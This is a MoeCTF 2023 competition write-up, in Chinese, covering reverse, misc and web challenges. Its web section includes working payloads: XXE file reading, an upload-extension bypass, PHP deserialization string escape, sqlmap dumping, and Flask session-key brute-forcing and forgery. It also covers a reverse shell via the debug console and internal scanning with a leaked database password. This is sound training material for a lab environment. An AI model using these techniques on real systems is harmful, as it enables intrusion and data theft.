moectf2023 wp

reverse

RRRRRc4

def rc4_init(s, key, Len_k):
    i = 0
    j = 0
    k = [0] * 256
    tmp = 0
    for i in range(256):
        s[i] = i
        k[i] = key[i % Len_k]
    for i in range(256):
        j = (j + s[i] + k[i]) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp

def rc4_crypt(Data, Len_D, key, Len_k):
    s = [0] * 256
    rc4_init(s, key, Len_k)
    i = 0
    j = 0
    t = 0
    k = 0
    for k in range(Len_D):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        tmp = s[i]
        s[i] = s[j]
        s[j] = tmp
        t = (s[i] + s[j]) % 256
        Data[k] = Data[k] ^ s[t]

if __name__ == "__main__":
    key = "moectf2023".encode("utf-8")
    key_len = len(key)

    data = bytearray([0x1B, 0x9B, 0xFB, 0x19, 0x06, 0x6A, 0xB5, 0x3B, 0x7C, 0xBA,
                      0x03, 0xF3, 0x91, 0xB8, 0xB6, 0x3D, 0x8A, 0xC1, 0x48, 0x2E,
                      0x50, 0x11, 0xE7, 0xC7, 0x4F, 0xB1, 0x27, 0xCF, 0xF3, 0xAE,
                      0x03, 0x09, 0xB2, 0x08, 0xFB, 0xDC, 0x22])

    rc4_crypt(data, len(data), key, key_len)

    for i in range(len(data)):
        print(chr(data[i]), end="")
    print()
#moectf{y0u_r3a11y_understand_rc4!!!!}

base_64

base64换表

import base64
import string

str1 = "yD9oB3Inv3YAB19YynIuJnUaAGB0um0="
string1 = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0123456789+/"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

print (base64.b64decode(str1.translate(str.maketrans(string1,string2))))

Xor

enc=[0x54, 0x56, 0x5C, 0x5A, 0x4D, 0x5F, 0x42, 0x60,
        0x56, 0x4C, 0x66, 0x52, 0x57, 0x09, 0x4E, 0x66,
        0x51, 0x09, 0x4E, 0x66, 0x4D, 0x09, 0x66, 0x61,
        0x09, 0x6B, 0x18, 0x44]
for i in enc:
	print(chr(i^0x39),end='')

ANDROIFD

enc=[25, 7, 0, 14, 27, 3, 16, '/', 24, 2, '\t', ':', 4, 1, ':', '*', 11, 29, 6, 7, '\f', '\t', '0', 'T', 24, ':', 28, 21, 27, 28, 16]
a=[]
key='themoekey'
for i in enc:
    if isinstance(i,int):
        a.append(i)
    else:
        a.append(ord(i))
#print(a)
for x in range(len(a)):
    print(chr(a[x]^ord(key[x%len(key)])),end='')

UPX！

UPX脱壳

enc =[10,   8,   2,   4,  19,   1,  28,  87,  15,  56, 30,  87,  18,  56,  44,   9,  87,  16,  56,  47,  87,  16,  56,  19,   8,  56,  53,   2,  17,  84, 21,  20,   2,  56,  50,  55,  63,  70,  70,  70, 26]
for i in enc:
	print(chr(i^0x67),end='')

misc

weird_package

bandzip修复文件

或者7z直接打开压缩包
9999是真flag

打不开的图片1

exif

打不开的图片2

改png文件头

狗子(1) 普通的猫

building_near_lake

烫烫烫

随波逐流得到

这是你的flag：

a9736d8ad21107398b73324694cbcd11f66e3befe67016def21dcaa9ab143bc4405be596245361f98db6a0047b4be78ede40864eb988d8a4999cdcb31592fd42c7b73df3b492403c9a379a9ff5e81262

但是flag用AES加密了，key是下面这行字的sha256（hash值的开头是b34edc782d68fda34dc23329）

所以说，codepage真的很重要啊（

狗子(2) 照片

zsteg嗦

base乐队

basecrack 然后栅栏4 然后base64

奇怪的压缩包

word，ppt都是压缩包
改ppt后缀打开
ctrl+a
第三页图片移开看注释
第四页移开图片
最后一页拖动文本框可以看见

机位查询

**moectf{jiashi_baisheng_huijin}**

狗子(3) 寝室

import zipfile
import os
import rarfile
import tarfile
import py7zr

a=9999
while a!=0:
  zipname='shell'+str(a)+'.zip'
  if(os.path.exists(zipname)):
    zfile=zipfile.ZipFile(zipname)
    zfile.extractall()
    zfile.close()
    a-=1
  rarname='shell'+str(a)+'.rar'
  if(os.path.exists(rarname)):
    rfile=rarfile.RarFile(rarname)
    rfile.extractall()
    rfile.close()
    a-=1
  tarname='shell'+str(a)+'.tar.gz'
  if(os.path.exists(tarname)):
    rfile=tarfile.open(tarname)
    rfile.extractall()
    rfile.close()
    a-=1
  zname='shell'+str(a)+'.7z'
  if(os.path.exists(zname)):
    file=py7zr.SevenZipFile(zname)
    file.extractall()
    file.close()
    a-=1

你想要flag吗

rabbit解密

照片冲洗

分离图片，b神的工具盲水印提取

狗子(4) 故乡话

尊嘟假嘟？

https://zdjd.vercel.app/

cipher: rY5Ah8BtsYYatLEPu8YCPU22Gr5PQt8YGDKkvb4bk3D4JJeEe5kgCpoEqgRzsM7m9d8jEtE3LUoKpULQnMcuAunU1gtpzC5kSUxFctFTNCMZVHLHZNCo5akzKMRY5bbyBP7RNUeGDEYoUc
key: the tailing 8 bytes of hash of "zundujiadu?" which begin with b6091904cdfb        
iv: the end 8 bytes of hash of "dududu?" which begin with 272bf1da2207                

hint1: how do Bitcoin addresses encode?
hint2: the name of cryptosystem is "bl****sh"

key和iv是sha256

web

http

Payload:
GET:UwU=u
POST:Luv=u
cookie:character=admin
x-forwarded-for:127.0.0.1
User-Agent: MoeBrowser

gas!gas!gas!

import requests
from bs4 import BeautifulSoup
url='http://localhost:58049/'
session=requests.Session()
fx = 0
sd = 0
data={"driver":"aaa","steering_control":fx,"throttle":sd}
re=session.post(url=url,data=data)
for i in range(7):
    if '向左' in re.text:
      fx=1
    if '向右' in re.text:
      fx=-1
    if '弯道直行' in re.text:
      fx=0
    if '抓地力太小了' in re.text:
      sd=0
    if '抓地力太大了' in re.text:
      sd=2
    if '保持这个速度' in re.text:
      sd=1
    soup = BeautifulSoup(re.content, "html.parser")
    info_div = soup.find("div", {"id": "info"})
    print(info_div.text)
    data={"driver":"aaa","steering_control":fx,"throttle":sd}
    re=session.post(url=url,data=data)
    print(data)
    

moe图床

只检测文件后缀第一个点后面的，xxx.png.php就行

彼岸的flag

cookie

注册一个新账号然后登录得到token

base64decode之后把role：user
改成admin,base64encode上传即可

大海捞针

bp爆破

了解你的座驾

import requests


headers = {
    'Host': 'localhost:52776',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'multipart/form-data; boundary=---------------------------15719226131077920622631907538',
    'Origin': 'null',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'cross-site',
    'Sec-Fetch-User': '?1',
}

data = '''-----------------------------15719226131077920622631907538
Content-Disposition: form-data; name="xml_content"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
    <!ENTITY b SYSTEM "file:///flag" >
]>
<xml><name>&b;</name></xml>

-----------------------------15719226131077920622631907538--
'''

response = requests.post('http://localhost:62103/', headers=headers, data=data)

print(response.text)

meo图床

加个gif头就能上传
发现可以上传php
但是不知道目录
一直尝试也访问不到木马
换思路
images.php能读文件，拿来读flag


弱比较数组绕过
?param1[]=1&param2[]=2

夺命十三枪

<?php
  highlight_file(__FILE__);

require_once('Hanxin.exe.php');

$Chant = isset($_GET['chant']) ? $_GET['chant'] : '夺命十三枪';

$new_visitor = new Omg_It_Is_So_Cool_Bring_Me_My_Flag($Chant);

$before = serialize($new_visitor);
$after = Deadly_Thirteen_Spears::Make_a_Move($before);
echo 'Your Movements: ' . $after . '<br>';

try{
  echo unserialize($after);
}catch (Exception $e) {
  echo "Even Caused A Glitch...";
}
  ?>

<?php

if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
    highlight_file(__FILE__);
}

class Deadly_Thirteen_Spears{
    private static $Top_Secret_Long_Spear_Techniques_Manual = array(
        "di_yi_qiang" => "Lovesickness",
        "di_er_qiang" => "Heartbreak",
        "di_san_qiang" => "Blind_Dragon",
        "di_si_qiang" => "Romantic_charm",
        "di_wu_qiang" => "Peerless",
        "di_liu_qiang" => "White_Dragon",
        "di_qi_qiang" => "Penetrating_Gaze",
        "di_ba_qiang" => "Kunpeng",
        "di_jiu_qiang" => "Night_Parade_of_a_Hundred_Ghosts",
        "di_shi_qiang" => "Overlord",
        "di_shi_yi_qiang" => "Letting_Go",
        "di_shi_er_qiang" => "Decisive_Victory",
        "di_shi_san_qiang" => "Unrepentant_Lethality"
    );

    public static function Make_a_Move($move){
        foreach(self::$Top_Secret_Long_Spear_Techniques_Manual as $index => $movement){
            $move = str_replace($index, $movement, $move);
        }
        return $move;
    }
}

class Omg_It_Is_So_Cool_Bring_Me_My_Flag{

    public $Chant = '';
    public $Spear_Owner = 'Nobody';

    function __construct($chant){
        $this->Chant = $chant;
        $this->Spear_Owner = 'Nobody';
    }

    function __toString(){
        if($this->Spear_Owner !== 'MaoLei'){
            return 'Far away from COOL...';
        }
        else{
            return "Omg You're So COOOOOL!!! " . getenv('FLAG');
        }
    }
}

?> 

通过__toString()满足if读flag

Make_a_Move方法替换序列化之后的字符
di_jiu_qiang长度12 替换为：string(32) "Night_Parade_of_a_Hundred_Ghosts"逃逸20
可以看到替换后Chant属性的字符长度没变
可以字符串逃逸
string(35) "";s:11:"Spear_Owner";s:6:"MaoLei";}"
需要逃逸35个字符
di_shi_san_qiang16 –> string(21) "Unrepentant_Lethality"逃逸5
payload：?chant=di_jiu_qiangdi_shi_san_qiangdi_shi_san_qiangdi_shi_san_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

出去旅游的心海

[http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php](http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php)

 <?php
/*
Plugin Name: Visitor auto recorder
Description: Automatically record visitor's identification, still in development, do not use in industry environment!
Author: KoKoMi
  Still in development! :)
*/

// 不许偷看！这些代码我还在调试呢！
highlight_file(__FILE__);

// 加载数据库配置，暂时用硬编码绝对路径
require_once('/var/www/html/wordpress/' . 'wp-config.php');

$db_user = DB_USER; // 数据库用户名
$db_password = DB_PASSWORD; // 数据库密码
$db_name = DB_NAME; // 数据库名称
$db_host = DB_HOST; // 数据库主机

// 我记得可以用wp提供的global $wpdb来操作数据库，等旅游回来再研究一下
// 这些是临时的代码

$ip = $_POST['ip'];
$user_agent = $_POST['user_agent'];
$time = stripslashes($_POST['time']);

$mysqli = new mysqli($db_host, $db_user, $db_password, $db_name);

// 检查连接是否成功
if ($mysqli->connect_errno) {
    echo '数据库连接失败: ' . $mysqli->connect_error;
    exit();
}

$query = "INSERT INTO visitor_records (ip, user_agent, time) VALUES ('$ip', '$user_agent', $time)";

// 执行插入
$result = mysqli_query($mysqli, $query);

// 检查插入是否成功
if ($result) {
    echo '数据插入成功';
} else {
    echo '数据插入失败: ' . mysqli_error($mysqli);
}

// 关闭数据库连接
mysqli_close($mysqli);

//gpt真好用
数据插入失败: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1

sqlmap -r 1.txt --batch -D wordpress -T secret_of_kokomi -C content --dump

POST /wordpress/wp-content/plugins/visitor-logging/logger.php?http:%2f%2f101.42.178.83:7770%2fwordpress%2fwp-content%2fplugins%2fvisitor-logging%2flogger.php HTTP/1.1
Host: 101.42.178.83:7770
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://101.42.178.83:7770
Connection: close
Referer: http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php
Cookie: comment_author_4c9aa5fddaa9877c73e1c45596fe15bd=a; comment_author_email_4c9aa5fddaa9877c73e1c45596fe15bd=a%40a.com; comment_author_url_4c9aa5fddaa9877c73e1c45596fe15bd=http%3A%2F%2Fa.com; wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

ip=1&user_agent=2&time=3

signin

from secrets import users, salt
import hashlib
import base64
import json
import http.server

with open("flag.txt","r") as f:
    FLAG = f.read().strip()

def gethash(*items):      # *items形参元组      
    c = 0
    for item in items:
        if item is None:
            continue
        c ^= int.from_bytes(hashlib.md5(f"{salt}[{item}]{salt}".encode()).digest(), "big")   # it looks so complex! but is it safe enough?
    return hex(c)[2:]

assert "admin" in users
assert users["admin"] == "admin"

hashed_users = dict((k,gethash(k,v)) for k,v in users.items())    #生成字典

eval([[0] for base64.b64encode in [base64.b64decode]]) # what is it?
    
def decrypt(data:str):
        for x in range(5):
            data = base64.b64encode(data).decode() # ummm...? It looks like it's just base64 encoding it 5 times? truely?
        return data

__page__ = base64.b64encode("PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDx0aXRsZT5zaWduaW48L3RpdGxlPgogICAgPHNjcmlwdD4KICAgICAgICBbXVsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXV1bKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVsrW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW10re30pWyshIVtdXSsoISFbXStbXSlbKyEhW11dXSgoK3t9K1tdKVsrISFbXV0rKCEhW10rW10pWytbXV0rKFtdK3t9KVsrISFbXV0rKFtdK3t9KVshK1tdKyEhW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rW11bKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyghIVtdK1tdKVsrISFbXV0rKCEhW10rW10pWytbXV1dWyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoW10re30pWyshIVtdXSsoW11bW11dK1tdKVsrISFbXV0rKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyghIVtdK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbK1tdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXV0oKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdW1tdXStbXSlbK1tdXSsoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXVtbXV0rW10pWytbXV0rKFtdW1tdXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKygre30rW10pWyshIVtdXSsoW10rW11bKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyghIVtdK1tdKVsrISFbXV0rKCEhW10rW10pWytbXV1dWyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoW10re30pWyshIVtdXSsoW11bW11dK1tdKVsrISFbXV0rKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyghIVtdK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbK1tdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXV0oKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdW1tdXStbXSlbK1tdXSsoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW11dKyghW10rW10pWyErW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKygre30rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSkoIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10pKVshK1tdKyEhW10rISFbXV0rKFtdW1tdXStbXSlbIStbXSshIVtdKyEhW11dKSghK1tdKyEhW10rISFbXSshIVtdKShbXVsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXV1bKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVsrW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW10re30pWyshIVtdXSsoISFbXStbXSlbKyEhW11dXSgoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW11bW11dK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbKyEhW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rKFtdW1tdXStbXSlbIStbXSshIVtdKyEhW11dKyghW10rW10pWyErW10rISFbXSshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCt7fStbXSlbKyEhW11dKyhbXStbXVsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXV1bKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVsrW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW10re30pWyshIVtdXSsoISFbXStbXSlbKyEhW11dXSgoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW11bW11dK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbKyEhW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rKCFbXStbXSlbIStbXSshIVtdXSsoW10re30pWyshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCt7fStbXSlbKyEhW11dKyghIVtdK1tdKVsrW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKFtdW1tdXStbXSlbKyEhW11dKSghK1tdKyEhW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXSkpWyErW10rISFbXSshIVtdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXV0pKCErW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10pKChbXSt7fSlbK1tdXSlbK1tdXSsoIStbXSshIVtdKyEhW10rW10pKyhbXVtbXV0rW10pWyErW10rISFbXV0pKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rKFtdK3t9KVshK1tdKyEhW11dKyghIVtdK1tdKVsrW11dKyhbXSt7fSlbKyEhW11dKygre30rW10pWyshIVtdXSkoIStbXSshIVtdKyEhW10rISFbXSkKICAgICAgICB2YXIgXzB4ZGI1ND1bJ3N0cmluZ2lmeScsJ2xvZycsJ3Bhc3N3b3JkJywnL2xvZ2luJywnUE9TVCcsJ2dldEVsZW1lbnRCeUlkJywndGhlbiddO3ZhciBfMHg0ZTVhPWZ1bmN0aW9uKF8weGRiNTRmYSxfMHg0ZTVhOTQpe18weGRiNTRmYT1fMHhkYjU0ZmEtMHgwO3ZhciBfMHg0ZDhhNDQ9XzB4ZGI1NFtfMHhkYjU0ZmFdO3JldHVybiBfMHg0ZDhhNDQ7fTt3aW5kb3dbJ2FwaV9iYXNlJ109Jyc7ZnVuY3Rpb24gbG9naW4oKXtjb25zb2xlW18weDRlNWEoJzB4MScpXSgnbG9naW4nKTt2YXIgXzB4NWYyYmViPWRvY3VtZW50W18weDRlNWEoJzB4NScpXSgndXNlcm5hbWUnKVsndmFsdWUnXTt2YXIgXzB4NGZkMjI2PWRvY3VtZW50W18weDRlNWEoJzB4NScpXShfMHg0ZTVhKCcweDInKSlbJ3ZhbHVlJ107dmFyIF8weDFjNjFkOT1KU09OW18weDRlNWEoJzB4MCcpXSh7J3VzZXJuYW1lJzpfMHg1ZjJiZWIsJ3Bhc3N3b3JkJzpfMHg0ZmQyMjZ9KTt2YXIgXzB4MTBiOThlPXsncGFyYW1zJzphdG9iKGF0b2IoYXRvYihhdG9iKGF0b2IoXzB4MWM2MWQ5KSkpKSl9O2ZldGNoKHdpbmRvd1snYXBpX2Jhc2UnXStfMHg0ZTVhKCcweDMnKSx7J21ldGhvZCc6XzB4NGU1YSgnMHg0JyksJ2JvZHknOkpTT05bXzB4NGU1YSgnMHgwJyldKF8weDEwYjk4ZSl9KVtfMHg0ZTVhKCcweDYnKV0oZnVuY3Rpb24oXzB4Mjk5ZDRkKXtjb25zb2xlW18weDRlNWEoJzB4MScpXShfMHgyOTlkNGQpO30pO30KICAgIDwvc2NyaXB0Pgo8L2hlYWQ+Cjxib2R5PgogICAgPGgxPmV6U2lnbmluPC9oMT4KICAgIDxwPlNpZ24gaW4gdG8geW91ciBhY2NvdW50PC9wPgogICAgPHA+ZGVmYXVsdCB1c2VybmFtZSBhbmQgcGFzc3dvcmQgaXMgYWRtaW4gYWRtaW48L3A+CiAgICA8cD5Hb29kIEx1Y2shPC9wPgoKICAgIDxwPgogICAgICAgIHVzZXJuYW1lIDxpbnB1dCBpZD0idXNlcm5hbWUiPgogICAgPC9wPgogICAgPHA+CiAgICAgICAgcGFzc3dvcmQgPGlucHV0IGlkPSJwYXNzd29yZCIgdHlwZT0icGFzc3dvcmQiPgogICAgPC9wPgogICAgPGJ1dHRvbiBpZCA9ICJsb2dpbiI+CiAgICAgICAgTG9naW4KICAgIDwvYnV0dG9uPgo8L2JvZHk+CjxzY3JpcHQ+CiAgICBjb25zb2xlLmxvZygiaGVsbG8/IikKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJsb2dpbiIpLmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIiwgbG9naW4pOwo8L3NjcmlwdD4KPC9odG1sPg==")
        
class MyHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        try:
            if self.path == "/":
                self.send_response(200)
                self.end_headers()
                self.wfile.write(__page__)
            else:
                self.send_response(404)
                self.end_headers()
                self.wfile.write(b"404 Not Found")
        except Exception as e:
            print(e)
            self.send_response(500)
            self.end_headers()
            self.wfile.write(b"500 Internal Server Error")

    def do_POST(self):
        try:
            if self.path == "/login":
                body = self.rfile.read(int(self.headers.get("Content-Length")))
                payload = json.loads(body)
                params = json.loads(decrypt(payload["params"]))
                print(params)
                if params.get("username") == "admin":
                    self.send_response(403)
                    self.end_headers()
                    self.wfile.write(b"YOU CANNOT LOGIN AS ADMIN!")
                    print("admin")
                    return
                if params.get("username") == params.get("password"):
                    self.send_response(403)
                    self.end_headers()
                    self.wfile.write(b"YOU CANNOT LOGIN WITH SAME USERNAME AND PASSWORD!")
                    print("same")
                    return
                hashed = gethash(params.get("username"),params.get("password"))        # md5(username)^md5(password)
                for k,v in hashed_users.items():
                    if hashed == v:
                        data = {
                            "user":k,
                            "hash":hashed,
                            "flag": FLAG if k == "admin" else "flag{YOU_HAVE_TO_LOGIN_IN_AS_ADMIN_TO_GET_THE_FLAG}"
                        }
                        self.send_response(200)
                        self.end_headers()
                        self.wfile.write(json.dumps(data).encode())
                        print("success")
                        return
                self.send_response(403)
                self.end_headers()
                self.wfile.write(b"Invalid username or password")
            else:
                self.send_response(404)
                self.end_headers()
                self.wfile.write(b"404 Not Found")
        except Exception as e:
            print(e)
            self.send_response(500)
            self.end_headers()
            self.wfile.write(b"500 Internal Server Error")

if __name__ == "__main__":
    server = http.server.HTTPServer(("", 9999), MyHandler)
    server.serve_forever()

def do_POST(self)方法做了几个限制
username 不能等于 admin
username 不能等于 password
可以利用字符和数字进行绕过，例如username="1" password=1

moeworld

moectf{Dig_Thr0ugh_Eve2y_C0de_3nd_Poss1bIlIti3s!!}解压密码

本题你将扮演**红队**的身份，以该外网ip入手，并进行内网渗透，最终获取到完整的flag

题目环境：http://47.115.201.35:8000/

在本次公共环境中渗透测试中，希望你**不要做与获取flag无关的行为，不要删除或篡改flag，不要破坏题目环境，不要泄露题目环境！**

**注册时请不要使用你常用的密码，本环境密码在后台以明文形式存储**

hint.zip 密码请在拿到外网靶机后访问根目录下的**readme**，完成条件后获取

环境出现问题，请第一时间联系出题人**xlccccc**

对题目有疑问，也可随时询问出题人

进入靶机注册登录之后

给了session 的key的前面的字符

import zlib
from itsdangerous import base64_decode
import ast
import os
from flask.sessions import SecureCookieSessionInterface


class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key


class FSCM:
    def encode(secret_key, session_cookie_structure):
        """ Encode a Flask session cookie """
        try:
            app = MockApp(secret_key)

            session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)

            return s.dumps(session_cookie_structure)
        except Exception as e:
            return "[Encoding error] {}".format(e)

    @staticmethod
    def decode(session_cookie_value, secret_key=None):
        try:
            if secret_key is None:
                compressed = False
                payload = session_cookie_value
                if payload.startswith('.'):
                    compressed = True
                    payload = payload[1:]
                data = payload.split(".")[0]
                data = base64_decode(data)
                if compressed:
                    data = zlib.decompress(data)
                return data
            else:
                app = MockApp(secret_key)
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.loads(session_cookie_value)
        except Exception as e:
            return "[Decoding error] {}".format(e)


if __name__ == "__main__":
    cnt = 1
    while True:
        cookie_value = 'eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6InpoYW55aSJ9.ZRU6Zg.c4JlmybB6IBoCVt7x1gJfKoRha4'
        secret_key = "This-random-secretKey-you-can't-get" + os.urandom(2).hex()
        if secret_key:
            result = FSCM.decode(cookie_value, secret_key)
        else:
            result = FSCM.decode(cookie_value)
        cnt += 1
        print(result, cnt)
        if 'power' in result:
            print(result, secret_key, 'YES')
            break

用脚本爆破得到key：This-random-secretKey-you-can't-get002c
尝试session伪造

if __name__ == "__main__":
    key="This-random-secretKey-you-can't-get002c"
    print(FSCM.encode(key,"{'power': 'admin', 'user': 'admin'}"))

[http://47.115.201.35:8000/console](http://47.115.201.35:8000/console) 138-429-604
反弹shell

moectf{Information-leakage-Is-dangerous!
另外根目录下也有readme文件


python获取本机内网ip

使用fscan扫描：./fscan -h 172.21.0.3/24 -np -no -nopoc
解压密码：22-3306-6379-8080

当你看到此部分，证明你正确的进行了fscan的操作得到了正确的结果
可以看到，在本内网下还有另外两台服务器
其中一台开启了22(ssh)和6379(redis)端口
另一台开启了3306(mysql)端口
还有一台正是你访问到的留言板服务
接下来，你可能需要搭建代理，从而使你的本机能直接访问到内网的服务器
此处可了解`nps`和`frp`，同样在/app/tools已内置了相应文件
连接代理，推荐`proxychains`
对于mysql服务器，你需要找到其账号密码并成功连接，在数据库中找到flag2
对于redis服务器，你可以学习其相关的渗透技巧，从而获取到redis的权限，并进一步寻找其getshell的方式，最终得到flag3

在shell里装一个pymysql pip install pymysql

import pymysql
>>> db = pymysql.connect(host="mysql",port=3306,user="root",passwd="The_P0sswOrD_Y0u_Nev3r_Kn0w",database="messageboard",charset='utf8')
<Nev3r_Kn0w",database="messageboard",charset='utf8')
>>> cursor=db.cursor()
cursor=db.cursor()
>>> cursor.execute("show databases")
cursor.execute("show databases")
5
>>> cursor.execute("show tables")
cursor.execute("show tables")
3
>>> cursor.fetchall()
cursor.fetchall()
(('flag',), ('message',), ('users',))
>>> cursor.execute("select *from flag")
cursor.execute("select *from flag")
1
>>> cursor.fetchall()
cursor.fetchall()
(('-Are-YOu-myS0L-MasT3r?-',),)
>>> 

